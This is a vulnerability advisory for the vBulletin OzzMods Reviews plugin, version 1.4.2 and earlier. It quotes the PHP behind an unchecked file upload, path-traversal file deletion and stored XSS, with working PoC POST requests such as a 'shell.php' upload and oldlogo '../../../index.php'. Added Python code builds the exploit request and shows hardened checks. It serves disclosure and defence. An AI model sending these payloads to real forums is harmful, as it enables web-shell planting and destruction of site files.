vBulletin OzzMods Reviews Plugin – XSS, Arbitrary File Upload & Deletion

Plugin: http://www.vbulletin.org/forum/showthread.php?t=304317
Version: <= 1.4.2, patched in 1.4.3 (latest)

Arbitrary File Upload
The vulnerable code is in /reviews_usercp.php, around lines 525 to 539:

		$audio = $_FILES['audio'];
		// Random body for the stored name, but the extension below is still the client's
		$filename = md5(time() + rand());
		$file_ext = strtolower(get_ext($audio[name]));   // taken from the uploaded file's own name, never validated
		$audio = $filename.'.'.$file_ext;
		require_once(DIR . '/christeris/reviews/includes/class.upload.php');
		$handle = new upload($_FILES['audio']);
		if ($handle->uploaded)
		{
			$handle->file_new_name_body = $filename;
			$handle->file_new_name_ext = $file_ext;   // client-controlled extension reused as-is
			$handle->Process(DIR . '/christeris/reviews/audio/');
			$handle-> Clean();
		} else {
			$audio = $oldaudio;
		}

As you can see, there is no file extension check: the extension is taken straight from the client-supplied filename via get_ext($audio[name]), lower-cased and reused as the extension of the stored file, so a .php upload is written as <md5>.php under /christeris/reviews/audio/.
To abuse this, create or update a review and add a file upload field named audio to the form.
After you submit the form, open the edit form again: the location of the uploaded file is shown there, so the randomised name does not have to be guessed.

Proof of concept (the request must be multipart/form-data so that audio is sent as a file part):

POST to: 	http://example.com/reviews_usercp.php?do=saveupdate
POST data: 	categoryid:	1
		audio:		(file part; the stored copy keeps this file's extension)
		reviewid:	0
		userid:		1
		urlid:		1
		securitytoken:	yoursecuritytoken
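The request the PoC above describes, as an added example that is not part of the advisory or of the OzzModz plugin: it builds the multipart body with the file part named audio, and mirrors the plugin's stored-name logic from the snippet (md5 body plus the client's extension) next to an allow-listed version. The target URL, token, field values, the allowed-extension set and the payload file are assumptions.

```python
"""Added example (not from the advisory or the OzzModz plugin).
Builds the multipart POST for reviews_usercp.php?do=saveupdate with the
file part named "audio", and mirrors the plugin's stored-name logic
(md5 body + client-supplied extension) next to an allow-listed version.
URL, token, field values and allowed extensions are assumptions."""
import hashlib
import os
import random
import time
import urllib.request

# Assumption: what a review's "audio" field should actually accept.
ALLOWED_AUDIO_EXT = {"mp3", "ogg", "wav"}


def get_ext(filename: str) -> str:
    """Mirror of the plugin's get_ext(): text after the last dot, '' if none."""
    return filename.rsplit(".", 1)[1] if "." in filename else ""


def vulnerable_stored_name(client_filename: str) -> str:
    """Same scheme as the snippet: random md5 body, extension copied from the
    client's filename with no allow-list, so shell.PHP is stored as <md5>.php."""
    body = hashlib.md5(str(int(time.time()) + random.randint(0, 2**31 - 1)).encode()).hexdigest()
    return f"{body}.{get_ext(client_filename).lower()}"


def extension_allowed(client_filename: str) -> bool:
    """Allow-list check the plugin is missing (case-insensitive)."""
    return get_ext(client_filename).lower() in ALLOWED_AUDIO_EXT


def hardened_stored_name(client_filename: str) -> str:
    """Same naming scheme, but the extension must pass the allow-list and the
    body comes from os.urandom rather than time()+rand()."""
    if not extension_allowed(client_filename):
        raise ValueError(f"extension {get_ext(client_filename)!r} not allowed")
    return f"{os.urandom(16).hex()}.{get_ext(client_filename).lower()}"


def build_multipart(fields: dict, file_field: str, filename: str,
                    content: bytes, boundary: str = "----ozzmods-poc"):
    """Encode plain form fields plus one file part as multipart/form-data.
    Returns (body_bytes, content_type_header)."""
    parts = []
    for name, value in fields.items():
        parts += [f"--{boundary}", f'Content-Disposition: form-data; name="{name}"', "", str(value)]
    parts += [f"--{boundary}",
              f'Content-Disposition: form-data; name="{file_field}"; filename="{filename}"',
              "Content-Type: application/octet-stream", ""]
    body = "\r\n".join(parts).encode() + b"\r\n" + content + f"\r\n--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"


def poc_request(url: str, token: str, filename: str, content: bytes) -> urllib.request.Request:
    """The saveupdate POST from the advisory, built but not sent."""
    fields = {"categoryid": 1, "reviewid": 0, "userid": 1, "urlid": 1, "securitytoken": token}
    body, ctype = build_multipart(fields, "audio", filename, content)
    return urllib.request.Request(url, data=body, headers={"Content-Type": ctype}, method="POST")


if __name__ == "__main__":
    # Assumed target and a benign marker file; send with urllib.request.urlopen(req) if desired.
    req = poc_request("http://example.com/reviews_usercp.php?do=saveupdate",
                      "yoursecuritytoken", "shell.php", b"<?php echo 'uploaded'; ?>")
    print(req.data.decode(errors="replace"))
    print("would be stored as:", vulnerable_stored_name("shell.php"))
```

The allow-list lives on the extension only because that is the value the snippet copies into file_new_name_ext; a real fix would also verify the content type server-side and keep the audio directory non-executable.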

Arbitrary File Deletion
The vulnerable code is in /reviews_usercp.php as well, around lines 474 to 482:

        // Manage Logo
        $oldlogo = $vbulletin->GPC['oldlogo'];     // request-supplied, used as a path fragment below

        $removelogo = $vbulletin->GPC['removelogo'];
        if ($removelogo == 1)
        {
            // No basename()/realpath() confinement: "../" sequences walk out of photos/
            unlink("christeris/reviews/photos/$oldlogo");
            unlink("christeris/reviews/photos/thumbs/$oldlogo");
            $oldlogo = '';
        }

No extension check, no file existence check, no check that the file belongs to the current user, and no check for directory traversal: $oldlogo is concatenated straight into the path, so ../ sequences walk out of the photos directory and unlink() removes any file the web server's user is allowed to delete.
Proof of concept:

POST to: 	http://example.com/reviews_usercp.php?do=saveupdate
POST data: 	categoryid:	1
		oldlogo:	../../../index.php
		removelogo:	1
		reviewid:	0
		userid:		1
		urlid:		1
		securitytoken:	yoursecuritytoken

Relative to the forum root, christeris/reviews/photos/../../../index.php resolves to index.php, so this deletes the index.php file in the root of the forum. The second unlink() call resolves to christeris/index.php instead and only produces a PHP warning if nothing is there. The deletion succeeds whenever the web server process has write permission on the forum root directory.
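Where the two unlink() calls actually land for the PoC value, and the confinement check that would have rejected it, as an added example that is not part of the advisory or of the plugin. The forum root is a temporary directory created by the script, and the ownership table is a constructed stand-in for the plugin's database lookup; the helper names are assumptions.

```python
"""Added example (not from the advisory or the OzzModz plugin).
Shows where unlink("christeris/reviews/photos/$oldlogo") and its thumbs/
twin land for the PoC value, and a confinement check that rejects it.
The forum root is a temporary directory and the ownership table is a
constructed stand-in for the plugin's database lookup."""
import os
import tempfile

PHOTO_DIR = os.path.join("christeris", "reviews", "photos")
THUMB_DIR = os.path.join(PHOTO_DIR, "thumbs")


def vulnerable_unlink_targets(forum_root: str, oldlogo: str):
    """The two paths the plugin hands to unlink(), resolved against the forum
    root (the working directory of reviews_usercp.php). No validation at all."""
    return (os.path.normpath(os.path.join(forum_root, PHOTO_DIR, oldlogo)),
            os.path.normpath(os.path.join(forum_root, THUMB_DIR, oldlogo)))


def safe_photo_path(forum_root: str, oldlogo: str, owner_of: dict, userid: int) -> str:
    """Hardened removal: bare filename only, must resolve inside photos/,
    must exist, and must belong to the user making the request."""
    if not oldlogo or os.path.basename(oldlogo) != oldlogo:
        raise ValueError("logo must be a bare filename")
    photo_root = os.path.realpath(os.path.join(forum_root, PHOTO_DIR))
    target = os.path.realpath(os.path.join(photo_root, oldlogo))
    if os.path.commonpath([photo_root, target]) != photo_root:
        raise ValueError("path escapes the photo directory")
    if not os.path.isfile(target):
        raise FileNotFoundError(target)
    if owner_of.get(oldlogo) != userid:   # assumed DB lookup: logo filename -> owning userid
        raise PermissionError("logo belongs to another user")
    return target


def demo() -> dict:
    """Build a throwaway forum root and exercise both functions; returns the
    outcomes so they can be checked without a real vBulletin install."""
    out = {}
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, THUMB_DIR))
        for rel in ("index.php", os.path.join(PHOTO_DIR, "mine.jpg"), os.path.join(PHOTO_DIR, "theirs.jpg")):
            open(os.path.join(root, rel), "w").close()
        owners = {"mine.jpg": 1, "theirs.jpg": 2}  # constructed stand-in for the database
        first, second = vulnerable_unlink_targets(root, "../../../index.php")
        out["photo_path"] = os.path.relpath(first, root)    # the forum root's index.php
        out["thumb_path"] = os.path.relpath(second, root)   # christeris/index.php, not present here
        for key, name in (("traversal", "../../../index.php"), ("foreign", "theirs.jpg"), ("missing", "missing.jpg")):
            try:
                safe_photo_path(root, name, owners, userid=1)
                out[key] = "allowed"
            except (ValueError, FileNotFoundError, PermissionError) as exc:
                out[key] = type(exc).__name__
        out["own"] = os.path.basename(safe_photo_path(root, "mine.jpg", owners, userid=1))
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The basename check alone stops the PoC; the realpath/commonpath check is kept as well so that a symlink dropped into photos/ (for instance via the upload bug above) cannot redirect the unlink outside the directory.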

Cross Site Scripting
Nearly all of the review form's fields are vulnerable to XSS as well.
Just inject a payload into the keywords or positive/negative points fields; it is saved with the review.

Image: OzzModz Review Arbitrary File Upload (screenshot of the upload)
